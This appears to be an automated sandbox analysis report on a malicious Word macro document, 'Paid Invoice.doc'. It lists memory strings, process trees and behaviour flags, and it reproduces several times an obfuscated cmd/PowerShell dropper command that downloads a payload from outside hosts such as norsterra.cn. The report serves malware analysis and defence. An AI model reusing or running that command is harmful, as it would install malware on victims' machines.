Source: iexplore.exe	String found in binary or memory: http://www.bing.com/bingbot.htm)D
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/favicon.icoA33DD
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/favicon.icoLinkID=403856&language=
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/favicon.icoa
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/favicon.icoj
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/maps/
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/maps/default.aspx
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/maps/geotager.aspx
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/safety/warning
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/search?q=
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/search?q=%7BsearchTerms%7D&src=IE-SearchBox&FORM=IESR02b
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/search?q=&src=IE-SearchBox&FORM=IENTSRguage
Source: iexplore.exe	String found in binary or memory: http://www.cdiscount.com/
Source: iexplore.exe	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.ceneo.pl/
Source: iexplore.exe	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: iexplore.exe	String found in binary or memory: http://www.cjmall.com/
Source: iexplore.exe	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.cnet.co.uk/
Source: iexplore.exe	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.dailymail.co.uk/
Source: iexplore.exe	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: iexplore.exe	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: iexplore.exe	String found in binary or memory: http://www.etmall.com.tw/
Source: iexplore.exe	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.excite.co.jp/
Source: iexplore.exe	String found in binary or memory: http://www.expedia.com/
Source: iexplore.exe	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.gmarket.co.kr/
Source: iexplore.exe	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.google.co.in/
Source: iexplore.exe	String found in binary or memory: http://www.google.co.jp/
Source: iexplore.exe	String found in binary or memory: http://www.google.co.uk/
Source: iexplore.exe	String found in binary or memory: http://www.google.com.br/
Source: iexplore.exe	String found in binary or memory: http://www.google.com.sa/
Source: iexplore.exe	String found in binary or memory: http://www.google.com.tw/
Source: iexplore.exe	String found in binary or memory: http://www.google.com/
Source: iexplore.exe	String found in binary or memory: http://www.google.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.google.cz/
Source: iexplore.exe	String found in binary or memory: http://www.google.de/
Source: iexplore.exe	String found in binary or memory: http://www.google.es/
Source: iexplore.exe	String found in binary or memory: http://www.google.fr/
Source: iexplore.exe	String found in binary or memory: http://www.google.it/
Source: iexplore.exe	String found in binary or memory: http://www.google.pl/
Source: iexplore.exe	String found in binary or memory: http://www.google.ru/
Source: iexplore.exe	String found in binary or memory: http://www.google.si/
Source: iexplore.exe	String found in binary or memory: http://www.iask.com/
Source: iexplore.exe	String found in binary or memory: http://www.iask.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.kkbox.com.tw/
Source: iexplore.exe	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: iexplore.exe	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.mercadolivre.com.br/
Source: iexplore.exe	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.merlin.com.pl/
Source: iexplore.exe	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: iexplore.exe	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: iexplore.exe	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: iexplore.exe	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: iexplore.exe	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: iexplore.exe	String found in binary or memory: http://www.mtv.com/
Source: iexplore.exe	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.najdi.si/
Source: iexplore.exe	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.nate.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.neckermann.de/
Source: iexplore.exe	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.orange.fr/
Source: iexplore.exe	String found in binary or memory: http://www.otto.de/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.ozon.ru/
Source: iexplore.exe	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.paginasamarillas.es/
Source: iexplore.exe	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.priceminister.com/
Source: iexplore.exe	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: iexplore.exe	String found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: iexplore.exe	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.rambler.ru/
Source: iexplore.exe	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.recherche.aol.fr/
Source: iexplore.exe	String found in binary or memory: http://www.rtl.de/
Source: iexplore.exe	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.servicios.clarin.com/
Source: iexplore.exe	String found in binary or memory: http://www.shopzilla.com/
Source: iexplore.exe	String found in binary or memory: http://www.sify.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.sogou.com/
Source: iexplore.exe	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.soso.com/
Source: iexplore.exe	String found in binary or memory: http://www.soso.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.taobao.com/
Source: iexplore.exe	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.target.com/
Source: iexplore.exe	String found in binary or memory: http://www.target.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.tchibo.de/
Source: iexplore.exe	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.tesco.com/
Source: iexplore.exe	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: powershell.exe	String found in binary or memory: http://www.umbriawifi.it/Ue8J/
Source: iexplore.exe	String found in binary or memory: http://www.univision.com/
Source: iexplore.exe	String found in binary or memory: http://www.univision.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.usertrust.com1
Source: iexplore.exe	String found in binary or memory: http://www.walmart.com/
Source: iexplore.exe	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.weather.com/
Source: iexplore.exe	String found in binary or memory: http://www.weather.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.ya.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.yam.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.yandex.ru/
Source: iexplore.exe	String found in binary or memory: http://www.yandex.ru/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www3.fnac.com/
Source: iexplore.exe	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: iexplore.exe	String found in binary or memory: http://yellowpages.superpages.com/
Source: iexplore.exe	String found in binary or memory: http://yellowpages.superpages.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://z.about.com/m/a08.ico
Source: iexplore.exe	String found in binary or memory: https://
Source: iexplore.exe	String found in binary or memory: https://en.wikipedia.org/wiki/XSLT/Muenchian_grouping
Source: iexplore.exe	String found in binary or memory: https://example.com
Source: iexplore.exe	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe	String found in binary or memory: https://ww
Source: iexplore.exe	String found in binary or memory: https://www.bing.com/
Source: iexplore.exe	String found in binary or memory: https://www.bing.com/ah
Source: iexplore.exe	String found in binary or memory: https://www.bing.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: https://www.bing.com/favicon.ico:0
Source: iexplore.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: iexplore.exe	String found in binary or memory: https://www.example.com.
Source: iexplore.exe	String found in binary or memory: https://www.mi
Source: iexplore.exe	String found in binary or memory: https://www.microso
Source: iexplore.exe	String found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-US&market=US&enableregulatorypsm=0&NTLogo=1
Source: powershell.exe	String found in binary or memory: https://www.nor
Source: powershell.exe	String found in binary or memory: https://www.norX
Source: powershell.exe	String found in binary or memory: https://www.nors
Source: powershell.exe	String found in binary or memory: https://www.norst
Source: powershell.exe	String found in binary or memory: https://www.norste
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/8
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?htt
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http:/
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tce
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?ht
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://a
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://ab
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://abou
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/a
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/ar
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/artic
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/article
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/article/
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/article/Ip
Source: powershell.exe	String found in binary or memory: https://www.norsterra.cnx&Zk

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180

Social media urls found in memory data

Show sources

Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/favicon.ico

Data Obfuscation:

Document contains an embedded VBA with many randomly named variables

Show sources

Source: Paid Invoice[1].doc.1.dr	Stream path 'Macros/VBA/NTiRlViMWCoM' : High entropy of concatenated variable names
Source: Paid Invoice.doc.usc4tz8.partial.1.dr	Stream path 'Macros/VBA/NTiRlViMWCoM' : High entropy of concatenated variable names

Obfuscated command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb source: ssvagent.exe
Source:	Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE
Source:	Binary string: mscorrc.pdb source: powershell.exe
Source:	Binary string: t:\misc_urlredirection\x86\ship\0\urlredirection.pdb source: iexplore.exe
Source:	Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb source: WINWORD.EXE
Source:	Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb> source: WINWORD.EXE
Source:	Binary string: 0\urlredirection.dll\bbtopt\urlredirectionO.pdb source: iexplore.exe

Binary contains paths to development resources

Show sources

Source: WINWORD.EXE

Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K

Classification label

Show sources

Source: classification engine

Classification label: mal72.evad.expl.win@11/29@8/3

Creates files inside the user directory

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Creates temporary files

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File created: C:\Users\HERBBL~1\AppData\Local\Temp\~DF2B45E99636F7990D.TMP

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Reads ini files

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3388 CREDAT:275457 /prefetch:2
Source: unknown	Process created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice.doc
